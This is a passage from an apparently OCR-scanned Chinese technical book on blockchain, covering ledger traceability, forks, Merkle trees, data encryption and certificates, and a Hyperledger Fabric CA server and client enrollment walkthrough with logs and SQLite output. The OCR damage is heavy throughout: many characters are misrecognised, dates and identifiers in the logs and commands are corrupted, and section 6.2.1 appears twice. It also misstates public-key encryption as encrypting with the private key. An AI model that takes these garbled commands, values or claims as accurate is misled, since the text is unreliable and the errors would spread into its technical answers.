不 当 ， 但 他 通过 合法 渠道 把 钱 支付 给 了 C， 那 么 C 手 里 的 钱 就 “ 洗 白 ” 了。 结果 就 是 ， 央 行 发 行货 币 后 ， 无 法 清晰 地 追踪 到 货币 是 怎么 流通 、 怎 么 使 用 的 ， 也 就 无 法 准确 评估 货币 政策 的 效果 。 这 就 是 区 块 


链 的 可 追溯 性 以 及 它 的 意义 所 在 。 区 块 链 网 络 中 所 有 的 数据 都 是 唯 的 ， 并 且 从 创造 出 来 到 现在 所 有 的 历史 都 可 以 查 到 ， 来 源 无 法 伪造 。 同 时 ， 由 于 所 有 的 数据 都 链接 在 一 起 ， 所 以 一 个 数据 不 能 凭空 造 
出 来 ， 也 不 能 凭空 抹 去 ,确认 之 后 也 不 能 修改 。 


当然 ， 要 改变 账本 中 的 数据 还 是 可 能 的 ， 就 是 利用 区 块 链 的 分 又 机 制 一 一 区 块 链 的 结构 不 是 直线 的 ， 而 是 树 状 的 ， 如 图 6-6 所 示 。 这 本 是 当初 中 本 聪 设计 出 来 ， 以 应 对 由 于 网 络 效率 低 、 延 迟 高 或 不 可 
用 情况 下 ， 避 免 渴 乱 的 方案 。 








这 样 ， 如 果 有 两 个 矿工 几乎 同时 算出 了 答案 ， 而 他 们 收 到 的 交易 数据 不 同 ， 导 致 两 个 区 块 不 同 ， 则 两 个 区 块 都 会 存在 ， 看 大 家 选择 在 分 义 后 的 哪个 分 支 上 继续 记 账 ， 最 长 的 分 支 被 认为 是 正统 的 分 
文 ， 其 他 分 支 里 的 合法 数据 后 面 被 汇总 过 来 ， 所 以 Chain 还 是 唯一 的 。 


图 6-6 ”区 块 链 分 又 


因为 区 块 链 具备 了 可 追溯 和 不 可 算 改 的 特性 ， 所 以 可 以 认为 所 有 数据 极 大 概率 上 都 是 安全 的 ， 安 全 性 超过 了 我 们 目前 所 有 中 心 化 处 理 数据 的 方案 。 即 使 智能 合约 在 初始 设 定时 考虑 不 周 ， 后 来 出 现 了 


问题 ， 也 可 以 追溯 到 一 开始 的 错误 所 在 和 造成 的 所 有 后 果 。 这 样 一 来 ， 网 络 的 成 员 们 完全 可 以 信任 这 个 网 络 ， 在 相互 不 认识 、 没 有 任何 信任 基础 时 也 可 以 放心 地 订立 合约 ， 进 行 交 易 ， 而 不 用 担心 系统 出 
错 或 者 对 手 恶 意 欺 骗 。 于 是 ， 这 个 系统 不 需要 有 管理 者 维护 秩序 ， 也 不 需要 信用 中 介 来 为 交易 双方 提供 担保 ， 它 本 身 便 起 到 了 共识 机 制 的 作用 。 
2.Merkle 树 如 何 保证 一 致 性 

目前 ， 在 计算 机 领域 ，Merkle 树 大 多 用 来 进行 比 对 以 及 验证 处 理 。 在 处 理 比 对 或 验证 的 应 用 场景 中 ， 特 别 是 在 分 布 式 环境 下 进行 比 对 或 验证 时 ，Merkle 树 会 大 大 减少 数据 的 传输 量 以 及 计算 的 复杂 


度 。 假 设 15,16,.…,30 是 一 个 个 数据 块 的 Hash 值 ， 用 户 把 这 些 数 据 从 A 传输 到 B。 数 据 传输 到 B 后 ， 用 户 想 验 证 下 传输 到 B 上 的 数据 的 有 效 性 (验证 数据 是 否 在 传输 过 程 中 发 生 了 变化 ) ， 只 需要 验证 A 和 B 上 


所 构造 的 Merkle 树 的 root 节 点 值 是 否 一 致 即 可 。 如 果 一 致 ， 表 示 数 据 是 有 效 的 ， 传 输 过 程 中 没有 发 生 改 变 。 假 如 在 传输 过 程 中 ，15 对 应 的 数据 被 人 算 改 ， 通 过 Merkle 树 很 容易 定位 找到 (因为 此 时 节点 
0,1,3,7,15 对 应 的 Hash 值 都 发 生 了 变化 ) ， 定 位 的 时 间 复 杂 度 为 O(log2n)。 


6.2 ”数据 传输 


6.2.1 ”加 密 数 据 传输 


在 数据 传输 过 程 中 如 何 保证 数据 的 安全 ? 如 何在 网 络 传输 数据 的 过 程 中 保证 数据 的 完整 性 、 保 密 性 ， 以 及 能 够 对 数据 的 发 送 者 进行 身份 验证 呢 ? 这 些 也 都 是 通过 加 密 算法 实现 的 。 数 据 的 加 密 方法 有 3 
种 。 


` 对 称 加 密 : 加 密 和 解密 使 用 同一 个 密 钥 。 特 点 : 保证 了 数据 的 保密 性 。 局 限 性 : 无 法 解决 密 钥 交换 问题 。 常 用 算法 : DES、3DES、AES。 
` 公 钥 加 密 : 生成 一 个 密 钥 对 ( 私 钥 和 公 角 ) ， 加 密 时 用 私 钥 加 密 ， 和 解密 时 用 公 锚 解密。 特点: 解决 了 密 钥 交换 问题 。 局 限 性 : 对 大 的 数据 加 密 速 度 慢 。 
` 单 向 加 密 : 提取 数据 的 特征 码 。 特 点 : 定 长 输出 ， 不 可 北 ， 可 检验 数据 的 完整 性 。 局 限 性 : 无 法 保证 数据 的 保密 性 。 常 用 算法 : MD5、SHA1、CRC-32。 


3 种 加 密 方法 各 有 优 缺 点 。 在 实际 应 用 中 ， 数 据 从 发 送 方 到 达 接 收 方 ， 通 常 是 这 样 应 用 的 。 


1) 对 要 发 送 的 数据 进行 单 向 加 密 ， 获 取 数 据 的 特征 码 。 


2) 对 特征 码 用 发送 方 的 私 钥 进行 加 密 ， 生 成 1。 

3) 对 91 和 数据 进行 对 称 加 密 ， 生 成 92。 

4) 将 5S2 和 对 称 加 密 的 密码 使 用 接收 方 的 公 钥 进 行 加 密 。 

这 样 一 来 ， 数 据 在 传输 过 程 中 的 完整 性 、 保 密 性 以 及 对 发 送 方 身份 的 验证 都 能 得 到 保障 。 

1) 当 数 据 到 达 接 收 方 时 ， 接 收 方 首先 用 自己 的 私 钥 对 接收 到 的 数据 进行 解密 ， 得 到 密码 和 加 密 的 数据 。 然 后 使 用 密码 对 加 密 数据 进行 解密 ， 得 到 加 密 的 特征 码 和 数据 。 
2) 用 发 送 方 的 公 钥 解 密 特征 码 。 如 果 能 解密 ， 则 说 明 该 数据 由 发 送 方 所 发 ， 反 之 ， 则 不 是 。 这 便 实现 了 身份 验证 。 

3) 最 后 计算 数据 的 特征 码 并 和 解密 出 来 的 特征 码 做 对 比 。 如 果 一 样 ， 则 该 数据 没有 被 修改 ; 反之 则 数据 被 修改 过 了 。 


但 是 在 此 过 程 中 还 存在 一 种 风险 ， 就 是 攻击 者 在 传输 过 程 中 充当 了 发 送 者 。 因 为 发 送 者 的 数字 签名 是 自己 制作 的 ， 所 以 在 发 送 给 接收 者 的 过 程 中 很 有 可 能 被 攻击 者 调换 一 一 攻击 者 将 公 钥 变更 为 自己 
的 私 铀 。 这 样 ， 虽 然 上 述 流程 很 有 可 能 是 发 送 者 与 攻击 者 或 者 欺诈 者 之 间 进 行 的 通信 ， 而 接收 者 却 一 无 所 知 。 鉴 于 此 ， 数 字 证 书 应 运 而 生 ， 以 进一步 对 通信 双方 进行 身份 认证 ， 拒 绝 了 数据 传输 过 程 中 的 
作假 。 


6.2 ”数据 传输 


6.2.1 加密 数据 传输 

在 数据 传输 过 程 中 如 何 保证 数据 的 安全 ”如 何在 网 络 传输 数据 的 过 程 中 保证 数据 的 完整 性 、 保 密 性 ， 以 及 能 够 对 数据 的 发 送 者 进行 身份 验证 呢 ? 这 些 也 都 是 通过 加 密 算法 实现 的 。 数 据 的 加 密 方法 有 3 
种 。 

` 对 称 加 密 : 加 密 和 解密 使 用 同一 个 密 钥 。 特 点 : 保证 了 数据 的 保密 性 。 局 限 性 : 无 法 解决 密 钥 交换 问题 。 常 用 算法 : DES、3DES、AES。 

` 公 钥 加密: 生成 一 个 密 钥 对 【( 私 钥 和 公 钥 ) ， 加 密 时 用 私 钥 加 密 ， 解 密 时 用 公 角 解密。 特点 : 解决 了 密 钥 交 换 问 题 。 局 限 性 : 对 大 的 数据 加 密 速 度 慢 。 

` 单 向 加 密 : 提取 数据 的 特征 码 。 特 点 : 定 长 输出 ， 不 可 逆 ， 可 检验 数据 的 完整 性 。 局 限 性 : 无 法 保证 数据 的 保密 性 。 常 用 算法 : MD5、SHA1、CRC-32。 

3 种 加 密 方法 各 有 优 缺 点 。 在 实际 应 用 中 ， 数 据 从 发 送 方 到 达 接 收 方 ， 通 常 是 这 样 应 用 的 。 

1) 对 要 发 送 的 数据 进行 单 向 加 密 ， 获 取 数 据 的 特征 码 。 

2) 对 特征 码 用 发 送 方 的 私 钥 进 行 加密 ， 生 成 S1。 

3) 对 S1 和 数据 进行 对 称 加 密 ， 生 成 52。 

4) 将 S2 和 对 称 加 密 的 密码 使 用 接收 方 的 公 钥 进行 加 密 。 

这 样 一 来 ， 数 据 在 传输 过 程 中 的 完整 性 、 保 密 性 以 及 对 发 送 方 身份 的 验证 都 能 得 到 保障 。 

1) 当 数 据 到 达 接 收 方 时 ， 接 收 方 首先 用 自己 的 私 钥 对 接收 到 的 数据 进行 解密 ， 得 到 密码 和 加 密 的 数据 。 然 后 使 用 密码 对 加 密 数据 进行 解密 ， 得 到 加 密 的 特征 码 和 数据 。 

2) 用 发 送 方 的 公 钥 解密 特征 码 。 如 果 能 解密 ， 则 说 明 该 数据 由 发 送 方 所 友 ; 有 反之， 则 不 是 。 这 便 实现 了 身份 验证 。 

3) 最 后 计算 数据 的 特征 码 并 和 解密 出 来 的 特征 码 做 对 比 。 如 果 一 样 ， 则 该 数据 没有 被 修改 ; 反之 则 数据 被 修改 过 了 。 


但 是 在 此 过 程 中 还 存在 一 种 风险 ， 就 是 攻击 者 在 传输 过 程 中 充当 了 发 送 者 。 因 为 发 送 者 的 数字 签名 是 自己 制作 的 ， 所 以 在 发 送 给 接收 者 的 过 程 中 很 有 可 能 被 攻击 者 调换 一 一 攻击 者 将 公 钥 变更 为 自己 
的 私 铀 。 这 样 ， 虽 然 上 述 流程 很 有 可 能 是 发 送 者 与 攻击 者 或 者 欺诈 者 之 间 进 行 的 通信 ， 而 接收 者 却 一 无 所 知 。 鉴 于 此 ， 数 字 证 书 应 运 而 生 ， 以 进一步 对 通信 双方 进行 身份 认证 ， 拒 绝 了 数据 传输 过 程 中 的 
作假 。 


6.2.2 ”数字 证 书 的 定义 


传统 意义 上 的 数字 证 书 是 指 由 CA (Certif icate Authority) 机 构 (又 称 证 书 授权 中 心 ， 如 Globalsign) 发 行 的、 用 以 在 互联 网 通信 中 标志 通信 各 方 身 份 信息 的 一 串 数字 。 它 提供 了 一 种 在 Internet 上 
验证 通信 实体 身份 的 方式 ， 人 们 可 以 用 它 来 识别 对 方 的 身份 ， 其 作用 类 似 于 司机 的 驾驶 执照 或 日 常生 活 中 的 身份 证 。 在 区 块 链 中 ， 数 字 证 书 是 指 经 证 书 授权 中 心 数字 签名 的 包含 公开 密 钥 拥有 者 信息 以 及 
公开 密 钥 的 文件 。 最 简单 的 证 书包 含 一 个 公开 密 钥 、 名 称 以 及 证 书 授权 中 心 的 数字 签名 。 


数字 证 书 是 一 种 权威 性 的 电子 文档 ， 可 以 由 权威 、 公 正 的 第 三 方 机 构 ， 即 CA 机 构 签 友 ， 也 可 以 由 企业 级 CA 系统 进行 签发 。 


以 数字 证 书 为 核心 的 加 密 技术 (加 密 传输 、 数 字 签名 、 数 字 信 封 等 安全 技术 ) 可 以 对 网 络 上 传输 的 信息 进行 加 密 和 和 解密、 数字 签名 和 签名 验证 ， 确 保 交 易 信息 的 机 密 性 、 完 整 性 及 不 可 抵赖 性 。 使 用 
了 数字 证 书 ， 即 使 您 发送 的 信息 在 网 上 被 他 人 截获 ， 甚 至 丢失 了 个 人 的 账户 、 密 码 等 信息 ， 仍 可 以 保证 账户 、 资 金 的 安全 。 


6.2.3 ”超级 账本 中 CA 的 实现 


Fabric CA 是 HyperLedger Fabric 的 官方 配套 认证 设施 。 
它 提供 的 功能 


. 身份 认证 ， 或 者 从 LDAP 中 获取 注册 信息 ; 


. 发 行 担 保证 书 ECerts (Enrollment Certif icates) ，; 
- 发 行 交易 证 书 TCerts (Transaction Certif icates) ， 保 障 Hypetledget Fabric 区 域 链 交易 平台 上 的 信息 匿名 性 和 不 可 追踪 性 ; 
证 书 更 新 和 撤销 。 

CA 服务 器 的 结构 如 图 6-7 所 示 。 


从 图 6-7 可 以 看 出 ，CA 服 务 器 为 树 形 结构 ， 根 节点 为 根 CA (Root Server) ， 存 在 多 个 中 间 CA (Intermediate CA) ， 每 个 中 间 CA 服 务 器 上 可 以 配置 一 个 CA 服务 集群 ，CA 服 务 集群 通过 前 置 的 HA 
Proxy 实 现 负载 均衡 。 
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图 6-7 CA 服务 器 结构 


Fabric CA 提供 了 两 种 访问 方式 调用 Server 服 务 ， 一 种 是 通过 Client 调 用 ， 另 一 种 是 通过 SDK 调 用 。 两 种 调用 都 是 REST 风 格 的 。 下 面 通过 一 个 本 地 的 Fabric CA 环境 看 看 Fabric CA 是 如 何 完成 以 上 功能 
的 。 


启动 Fabric CA。 首 先 启动 fabric-ca-server: 








fabric-ca-server 
start -b admin:adminpw 


启动 CA Server 后 ， 在 服务 器 根 目 录 下 分 别 新 建 了 ca1 和 ca2 两 个 文件 夹 。 启 动 过 程 中 ， 服 务 器 首先 通过 ECDSA SHA256 算 法 生成 密 钥 ， 然 后 编码 生成 CSR (Cerif icate Signing Request， 证 书签 名 
请 求 。CSR 中 包含 请 求 用 户 的 城市 、 公 司 等 基本 信息 ) ，CA 服 务 器 对 CSR 中 的 基本 信息 通过 数字 签名 制作 数字 证 书 并 颁发 给 申请 者 。 从 图 6-8 中 可 以 看 出 ， 最 终生 成 的 CA 证 书 存 储 在 ca1 和 ca2 文 件 夹 下 的 
ca-cert.pem 文 件 里 。 生 成 数字 证 书后 ，CA 服 务 器 会 将 证 书信 息 写 入 到 数据 库 或 LDAP 目 录 服 务 器 中 。 图 6-9 所 示 为 执行 服务 器 启动 后 生成 的 目录 结构 ， 其 中 fabric-ca-conf ig.yaml 是 启动 过 程 中 所 使 用 的 
配置 文件 ， 而 生成 的 证 书 文 件 则 默认 存放 在 ca1 和 ca2 文 件 夹 下 的 SQLite3 DB 中 。 


2017/66/26 22:45:24 [INFO] Starting server in home directory: /home/abc/ca-serve 


. 
2017/906/26 22:45:24 [INFO] Loading CA from /home/abc/ca-server/ca/cal/fabric-ca- 
config .yaml 

2017/06/26 22:45:24 [INFO] generating key: &{A:ecdsa S:256} 

2017/066/26 22:45:24 [INFO] encoded CSR 

2017/06/26 22:45:24 [INFO] signed certificate with serial number 168221925559326 
335975823583536177207988805526157 

2017/66/26 22:45:24 [INFO] The CA key and certificate were generated for CA cal 

20171/06/1/26 22:45:24 [INFO] The key was stored by BCCSP provider 'SW' 

2017/906/26 22:45:24 [INFO] The certificate is at: /home/abc/ca-server/ca/cal/ca- 
Cert .pem 

2917/06/26 22:45:25 [INFO] Initialized sqLite3 database at /home/abc/ca-server/c 
a/cal/fabric-ca-server .db 

2017/66/26 22:45:25 [INFO] Loading CA from /home/abc/ca-server/ca/ca2/fabric-ca- 
confiLg.yamL 

2017/66/26 22:45:25 [INFO] generating key: &{A:ecdsa S:256} 

2017/06/26 22:45:25 [INF0] encoded CSR 

2017/96/26 22:45:25 [INFO] signed certificate with serial number 47084040062901 

2107955618833875805901488944870960 

2017/066/26 22:45:25 [INFO] The CA key and certificate were generated for CA ca2 

2017/066/26 22:45:25 [INFO] The key was stored by BCCSP provider 'SW' 

2017/966/26 22:45:25 [INFO] The certificate is at: /home/abc/ca-server /ca/ca2/ca- 
cert.pem 





图 6-8 ”启动 CA 服务 器 


ca-cert.pem 
fabric-ca-config.yaml 
fabric-ca-server.db 
msp 
LL keystore 
[一 599be3b263c853ec1606cba6955632c73cfa8bd2e56a5e81891c31512b79b378 sk 


ca-cert.pem 
fabric-ca-config.yaml 


fabric-ca-server.db 


msp 
LL keystore 
-一 babe1l155b5c6dca2f9cfc6efa6475940ff4c66eef2b3820bodb7dd65ddbdb6e9 sk 
ca-cert.pem 
fabric-ca-server-config.yaml 
fabric-ca-server.db 
msp 
一 keystore 
上 -一 19ele78637054dc5a74004778452f464cccde4bf333e24f5cd76ad2cogc96cgc3 sk 





图 6-9 CA 目录 结构 


切换 到 ca1 文 件 夹 下 ， 通 过 OpenssL 命 令 查 看 证 书 内 容 ， 如 图 6-10 所 示 。 可 以 看 到 ， 数 字 证 书 中 包含 了 签名 算法 信息 、 申 请 者 基本 信息 、 申 请 者 公 钥 信 息 等 。 


root@abc-ThinkPad-X201:# openssL x569 -in ca-cert.pem -inform pem -noout -text 
Certificate: 
Data: 
Version: 3 (9x2) 
Serial Number: 
1d:77:54:ff:f2:d6:b5:cl1:9e:68:cf:4c:9e:86:08:1c:7e:dd:62:8d 
Signature Algorithm: ecdsa-with-SHA256 
Issuer: C=US, ST=North Carolina, 0=Hyperledger, OU=Fabric, CN=fabric-ca-server-cal 
Validity 
Not Before: Jun 26 14:40:60 2017 GMT 
Not After : Jun 22 14:40:00 2032 GMT 
Subject: C=US, ST=North Carolina, 0=Hyperledger, OU=Fabric, CN=fabric-ca-server-cal 
Subject Public Key Info: 
Public Key Algorithm: id-ecPubLicKey 
Public-Key: (256 bit) 
pub: 
04:a7:88:77:64:99:2c:b90:cc:40:ba:cf:92:0a:2e: 
bc:e6:65:61:f4:df:16:f2:fb:7c:32:f4:e3:67:a6: 
67:f3:b4:5d:d0:cd:68:44:ef:83:c6:a0:3f:b6:1d: 
c4:e6:6f:e8:b8:17:e9:f9:a8:51:b6:86:e6:4f:01: 
d6:9c:ab:f6:73 
ASN1 OID: prime256v1 
X509v3 extensions: 





图 6-10 ”数字 证 书信 息 


打开 存储 所 发 证 书信 息 的 SQLite3 数 据 库 ， 可 以 看 到 如 图 6-11 所 示 的 信息 。 


root@abc-ThinkPad-X261:# sqlite3 fabric-ca-server.db 
SQLite version 3.8.2 2013-12-06 14:53:30 

Enter ".help" for instructions 

Enter SQL statements terminated with a ";" 
sqlite> .tables 

affiliations certificates USers 
sqlite> select * from users; 
admin|adminpw|client||[{"name":"hf.Registrar.Roles","value":"client,user ,peer ,validator ,auditor"},{"na 
me":"hf.Registrar.DelegateRoles","valuyue":"client,user ,validator ,auditor"},{"name":"hf.Revoker","value' 
:"1"},{"name":"hf.IntermediateCA","value":"1"}]|90|-1 

sqlite> select * from certificates; 

sqlite> 目 





图 6-11 SQLite 3DB 中 存储 的 信息 


由 图 6-11 可 以 看 到 ， 数 据 库 中 有 3 个 表 。 其 中 users 表 中 目前 只 有 启动 时 设 定 的 引导 节点 国 ; 还 没有 注册 其 他 节点 ; certif icates 表 中 目前 没有 任何 发 放 证 书记 录 。 下 面 尝 试 使 用 fabric-ca 先 登记 引导 节 
氮 ， 命 令 如 下 。 


fabric-ca-client enroll -u http:// admin:adminpw@localhost:7054 








这 里 的 admin 和 adminpw 就 是 fabric-ca-server 启 动 时 设置 的 引导 节点 登记 1D 和 密码 。 


Client 执 行 结果 如 图 6-12 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-client enroll -uyu http://admin:adminp 
w@lLocalhost:7054 

2017/066/26 23:27:29 [INFO] User provided config file: /home/abc/ca-client/fabric 
-Ca-cCclient-config.yaml 

2017/06/26 23:27:29 [INFO] Created a default configuration file at /home/abc/ca- 
client/fabric-ca-client-config.yaml 

2017/06/26 23:27:29 [INFO] generating key: &{A:ecdsa S:256} 


2017/066/26 23:27:29 [INFO] encoded CSR 

2017/066/26 23:27:30 [INFO] Stored client certificate at /home/abc/ca-client/msp/ 
signcerts/cert.pem 

2017/066/26 23:27:30 [INFO] Stored CA certificate chain at /home/abc/ca-client/ms 
p/cacerts/localhost-7054.pem 

root@abc-ThinkPad-X201: /home/abc# 国 





图 6-12 Client 端 登记 节点 


Server 端 接收 到 如 下 登记 请 求 : 





2017/06/26 23:27:30 [INFO] 127.0.0.1:5081 - "POST /enroll" 200 








Server 端 接收 到 登记 消息 后 ， 会 在 ca-client 目 录 下 生成 如 图 6-13 所 示 的 目录 结构 。 


fabric-ca-client-config.yaml 
msp 


cacerts 
LL LocaLhost-7654.pem 


keystore 

LL 99dag2d8513537cf5b61adc85d6e6a89d1if3b10d2d7d632204a23b949d76dc96 sk 
signcerts 

[一 cert.pem 





图 6-13 ”登记 生成 的 目录 结构 


其 中 msp/signcerts 目 录 下 存储 的 是 Client 的 数字 证 书 ，cacerts 目 录 下 存储 的 是 证 书 链 信息 。 回 到 ca-server 目 录 下 ， 打 开 SQLite3 数 据 库 ， 可 以 看 到 刚刚 颁发 的 数字 证 书 已 经 记录 在 数据 库 里 了 ， 如 图 
6-14 所 示 。 


sqlite> select * from certificates; 
admin|a70706d762c0690ba6b2c92e250dc4c83c8710aed|f2643198ea28e9b7f1laale9b466. 
-26 15:23:00+00:0010001-61-01 00:00:00+00:00| BEGIN CERTIFICATE 
MIICRDCCAeugAwIBAgIUCnBwbXYsALprLJLiLUNxMg8hxCu9wCgYIKoZIzjo9EAwIwW 
aDELMAKkGA1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQK 
EwtIeXBlcmxlZGdlcjEPMAOGA1UECxMGRmFicmlL jMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNjE1MjMwMFoXDTE4MDYyNjE1MjMwMFowXTELMAKG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
CmXxLZzadLcjEPMAOGCA1UECxMOCRmFiLcmLjMQ4wDAYDVQQDEwVhzG1pbjBZMBNMOCBYyqc 
SMA9AgEGCCqGSM49AwEHAOIABEdPjiFD34uBL+GGTRijnL41rXerKtBtNU6WIHVTLs 
BERisxbIoZ/Ngq6V5r9qJWEukKYn2ThJDFLDaD8WnUtrUpyjfjB8MA4GA1UdDwEB 
/wQEAwICBDAMBgNVHRMBAf8EAjAAMBOGA1UdDgQWBBRdAPQJ7QYSngqvM8V+B3m1 
UOQdtQzAfBgNVHSMEGDAWgBTyZDGY6ijpt/GqHptGZIospPL4iLTACBgNVHREEFTAT 
ghFhYmMtVGhpbmtQYWQtWDIwMTAKBggqhkjOPQQDAgNHADBEATLAiL52JLINLGKk3AY 
NA/aAWbnIlzrb9Dg2FGxYfRg3Sk8CAIgNRfOJSFpOzSVinW2rgsYLLVYPfBEMWoy 
VVTako9MWZCcC= 

END CERTIFICATE 





图 6-14 DB 中 的 新 证 书 


接 下 来 使 用 fabric-ca-client 注 册 一 个 新 的 节点 ， 这 一 步 就 是 为 Fabric 中 的 peer、user 角 色 进 行 注 册 并 登记 的 过 程 了 。 注 册 的 命令 为 : 























fabric-ca-client register --id.name aqmin2 --id.type user --id.affiliation orgl.departmentl1 --id.attrs "hf.Revoker=truey foo=bar' 














这 里 有 两 点 需要 注意 。 


1) --id.type 参 数 必 须 是 Server 端 配置 文件 里 hf.Registrar.Roles 属 性 值 里 一 个 打开 fabric-ca-server 的 配置 文件 ， 如 图 6-15 所 示 。 


identities: 

- name: admin 
pass: adminpw 
type: client 
affiliation: 
maxenrollments: -1 


attrs : 
hf.Registrar .图 oLes: "client,user ,peer ,validator ,auditor" 
hf .Registrar .DeLegateRoLes: "client,user ,validator ,auditor" 
hf .Revoker : true 
hf .IntermediateCA: true 





图 6-15 fabric-ca-se tvet 配 置 文件 


其 中 通过 hf.Registrar.Roles 的 属性 值 可 以 看 出 ， 客 户 端 可 以 注册 的 类 型 有 client、user、peer、validator 和 auditor。 


2) --id.aff iliation 这 个 属性 表示 被 注册 对 象 的 从 属 关 系 参 数 一 定 要 归属 于 预先 配置 的 组 织 属性 。 换 句 话 说， 被 注册 对 象 的 aff iliation 参 数 一 定 要 是 预先 配置 的 aff iliation 参 数 的 一 个 前 缀 。 例 如 ， 假 
设 预 先 配 置 的 组 织 关 系 为 “a.b.c”， 那 么 新 注册 的 对 象 的 aff iliation 属 性 可 以 是 “a.b.c”， 也 可 以 是 “a.b”， 但 “a.c” 则 不 能 通过 注册 。 下 面 将 演示 执行 节点 注册 user 的 过 程 。Client 端 执行 结果 如 图 6- 
16 所 示 。 


root@abc-ThinkPad-X201: /home/abc/ca-client# fabric-ca-client register --id.name 
admin2 --id.type user --id.affiliation orgl.department1l --id.attrs 'hf.Revoker=i 
rue ,foo=bar ' 

2017/06/27 00:01:05 [INFO] User provided config file: /home/abc/ca-client/fabric 


-Ca-cCclient-config.yaml 

2017/66/27 00:01:05 [INFO] Configuration file location: /home/abc/ca-client/fabir 
ic-ca-client-config.yaml 

Password: wtLafXUdYMO0a 

rootoabc-ThinkPad-X261: /home/abc/ca-cLient# 国 





图 6-16 ”Client 端 注册 user 
这 里 分 配 的 password 需 要 记 住 ， 后 面 在 登记 该 节点 时 会 用 到 。Server 端 接收 到 如 下 请 求 : 


2017/06/27 00:01:05 [INFO] 127.0.0.1:50904 - "POST /register" 200 








登记 刚刚 注册 过 的 admin2 节 点 ， 命 令 如 下 。 











fabric-ca-client enroll -u http:// admin2:wtLafXUdYMOa@localhost:7054 -M $FABRIC 
CA CLIENT HOME/msp 





























这 里 登记 时 使 用 的 enroll ID 和 密码 就 是 上 面 注册 过 程 中 的 节点 名 称 和 返回 的 密码 信息 。 注 册 过 程 中 也 是 可 以 指定 密码 的 。 执 行 登记 命令 ， 结 果 如 图 6-17 所 示 。 


root@abc-ThinkPad-X261: /home/abc/ca-client# fabric-ca-client enroll -uyu http://ad 
min2:wtLafXUdYMOa@localhost:7054 -M $FABRIC_ CA_CLIENT_HOME/msp 

2017/06/27 00:12:26 [INFO] User provided config file: /home/abc/ca-client/fabric 
-Ca-client-config.yaml 

2017/06/27 00:12:26 [INFO] generating key: &{A:ecdsa S:256} 

2017/066/27 00:12:26 [INFO] encoded CSR 

2017/066/27 00:12:27 [INFO] Stored client certificate at /home/abc/ca-client/msp 
signcerts/cert.pem 

2017/066/27 00:12:27 [INFO] Stored CA certificate chain at /home/abc/ca-client/m 
p/cacerts/localhost-7054.pem 





图 6-17 执行 登记 命令 


打开 fabric-ca-server 的 SQLite 数 据 库 ， 如 图 6-18 所 示 。 


sqlite> select * from USers; 
admin|adminpw|client||[{"name":"hf.Registrar.Roles","value":"client,user ,peer ,validator ,auditor"},{"na 


me":"hf.Registrar.DelegateRoles","value":"client,user ,validator ,auditor"},{"name":"hf.Revoker","value" 
:"1"},{"name":"hf.IntermediateCA","value":"1"}]|1|-1 


admin2|wtLafXUdYMOaluser|orgl.department1i|[{"name":"hf.Revoker","value":"true"},{"name":"foo","value": 
"bar"}]111-1 , 








图 6-18 SQLite 数据 库 信 息 


查看 用 户 信息 ， 其 中 有 一 个 client 节 点 admin 和 一 个 user 节 点 admin2。 其 中 admin 是 一 个 中 间 CA。 打 开 数 据 库 表 certif icates， 这 时 可 以 看 到 给 admin2 颁 发 的 证 书 已 经 记录 了 ， 如 图 6-19 所 示 。 


admin215841b439f26a7bbb54c4bd68732e6c7e64f1lc8cl|f2643198ea28e9b7f1laale9b46648a2ca4f2f8891|1good1612018-6 
6-26 16:07:00+00:0010001-91-01 90:00:00+00:09| BEGIN CERTIFICATE 
MIICRDCCAeygAwIBAgIUBYQbQS58mp7u1TEvQhzLmx+ZPHIwwCgYIKoZIzjOEAwIw 
aDELMAkGA1UEBhMCVVMxFzAVBgNVBAgTDkSvcnRoIENhcm9saWShMRQwEgYDVQQK 
EwtIeXBLlcmxlZGdlcjEPMAOGA1UECxMGRmFicmlL jMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNjE2MDcwMFoXDTE4MDYyNjE2MDcwMFowXjELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
CmxLZzadtLcjEPMAOGA1UECxMGCRmFiLcmLjMQ8wDQYDVQQDEwZzhZzG1lpbjIwWTATBgcq 
hkjOPQIBBggqhkjOPQMBBwNCAAQYNfZTh2y15igS/H+bFDPFr3S4sBkuUyQKfTiW 
TemqiWYW46NLtRyOQX4zdubwrMfEkm/W4RnvWyT9ZGscCmWOo34wfDAOBgNVHQ8B 
Af8EBAMCAgQwDAYDVROTAQH/BAIwADAdBgNVHQ4EFgQUA4JaR8hszOTTCbrm7Zx2 
Y38fgfQwHwYDVROjBBgwFoAU8mQxmOoo6bfxqh6bRmSKLKTy+IkwHAYDVRORBBUw 
E4IRYWJjLVRoaWSrUGFkLVgyMDEwCgYIKoZIzjOEAwIDRgAwQwIfeSmPxTburUQ1 
O04wcXHJc8JiReHxaruiH1LAXms82RQIgNiQeJkZh2rCHMTkqnUXDFZj7dls1fF31 
VDkrMarMyBw= 

END CERTIFICATE 





图 6-19 ”证 书信 息 


重新 登记 节点 (在 节点 授权 即将 到 期 时 需要 重新 登记 节点 信息 ) ， 命 令 如 下 。 





fabric-ca-client reenroll 





Client 端 得 到 的 信息 如 图 6-20 所 示 。 


root@abc-ThinkPad-X201: /home/abc/ca-client/msp# fabric-ca-client reenroll 
2017/066/27 00:19:53 [INFO] User provided config file: /home/abc/ca-client/fabric 
-Ca-CLLent-confiLg.yamL 

2017/06/27 00:19:53 [INFO] Configuration file location: /home/abc/ca-client/fabr 
ic-ca-client-config.yaml 


2017/66/27 00:19:53 [INFO] generating key: &{A:ecdsa S:256} 

2017/66/27 00:19:53 [INFO] encoded CSR 

2017/66/27 00:19:53 [INFO] Stored client certificate at /home/abc/ca-client/msp/ 
signcerts/cert.pem 

2017/06/27 00:19:53 [INFO] Stored CA certificate chain at /home/abc/ca-client/ms 
p/cacerts/localhost-7054.pem 





图 6-20 重新 登记 节点 信息 
重新 登记 过 程 中 会 重新 发 送 签名 证 书 请 求 ， 获 取 新 的 数字 证 书 。 打 开 Server 端 数据 库 ， 可 以 看 到 两 条 颁发 给 节点 admin2 的 证 书记 录 ， 两 个 证 书 颁发 的 时 间 不 一 样 。 


